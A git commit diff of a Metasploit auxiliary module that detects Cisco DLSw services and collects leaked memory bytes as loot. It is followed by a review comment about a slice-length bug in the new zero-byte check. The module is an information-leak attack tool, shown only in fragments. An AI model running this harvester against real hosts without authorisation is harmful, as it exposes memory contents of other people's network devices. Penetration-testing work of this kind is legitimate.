added DLSw v1 and v2 check, added check for \x00 in leak segment
parent
e9750e2df8
commit
3aecd3a10e
|
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
"#{rhost}:#{rport}"
|
"#{rhost}:#{rport}"
|
||||||
end
|
end
|
||||||
|
|
||||||
def get_response(size = 8)
|
def get_response(size = 72)
|
||||||
connect
|
connect
|
||||||
response = sock.get_once(size)
|
response = sock.get_once(size)
|
||||||
disconnect
|
disconnect
|
||||||
|
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if response.blank?
|
if response.blank?
|
||||||
vprint_status("#{peer}: no response")
|
vprint_status("#{peer}: no response")
|
||||||
Exploit::CheckCode::Safe
|
Exploit::CheckCode::Safe
|
||||||
elsif response[0..3] == "\x31\x48\x01\x5b"
|
elsif response[0..1] == "\x31\x48" || response[0..1] == "\x32\x48"
|
||||||
vprint_good("#{peer}: Detected DLSw protocol")
|
vprint_good("#{peer}: Detected DLSw protocol")
|
||||||
report_service(
|
report_service(
|
||||||
host: rhost,
|
host: rhost,
|
||||||
|
@ -71,6 +71,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
)
|
)
|
||||||
# TODO: check that response has something that truly indicates it is vulnerable
|
# TODO: check that response has something that truly indicates it is vulnerable
|
||||||
# and not simply that it responded
|
# and not simply that it responded
|
||||||
|
unless response[18..72].scan(/\x00/).length == 54
|
||||||
print_good("#{peer}: leaked #{response.length} bytes")
|
print_good("#{peer}: leaked #{response.length} bytes")
|
||||||
report_vuln(
|
report_vuln(
|
||||||
host: rhost,
|
host: rhost,
|
||||||
|
@ -80,6 +81,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
info: "Module #{fullname} collected #{response.length} bytes"
|
info: "Module #{fullname} collected #{response.length} bytes"
|
||||||
)
|
)
|
||||||
Exploit::CheckCode::Vulnerable
|
Exploit::CheckCode::Vulnerable
|
||||||
|
end
|
||||||
else
|
else
|
||||||
vprint_status("#{peer}: #{response.size}-byte response didn't contain any leaked data")
|
vprint_status("#{peer}: #{response.size}-byte response didn't contain any leaked data")
|
||||||
Exploit::CheckCode::Safe
|
Exploit::CheckCode::Safe
|
||||||
|
@ -92,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
dlsw_data = ''
|
dlsw_data = ''
|
||||||
until dlsw_data.length > datastore['LEAK_AMOUNT']
|
until dlsw_data.length > datastore['LEAK_AMOUNT']
|
||||||
response = get_response(72)
|
response = get_response
|
||||||
dlsw_data << response[18..72] unless response.blank?
|
dlsw_data << response[18..72] unless response.blank?
|
||||||
end
|
end
|
||||||
loot_and_report(dlsw_data)
|
loot_and_report(dlsw_data)
|
||||||
|
|
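Review bot: The new line `unless response[18..72].scan(/\x00/).length == 54` in the third hunk assumes a full 72-byte read: `response[18..72]` is nil when the response is shorter than 19 bytes (so `.scan` raises NoMethodError after the DLSw header test already passed), and a response of 19–71 bytes yields a slice shorter than 54 bytes whose zero count can never equal 54, so the host is reported Vulnerable on a truncated read rather than on real leaked data. `sock.get_once(size)` can return fewer bytes than requested, so the window length needs checking before its contents; `leak = response[18..72].to_s` followed by `unless leak.length < 54 || leak.count("\x00") == 54` keeps the Safe branch for both cases, and `String#count` avoids building a match array. The same 54 is implied by the slice bounds here and in the `dlsw_data << response[18..72]` line of the last hunk, so a named constant for the window width would keep the two in step. The enclosing `check` method starts and ends outside this hunk.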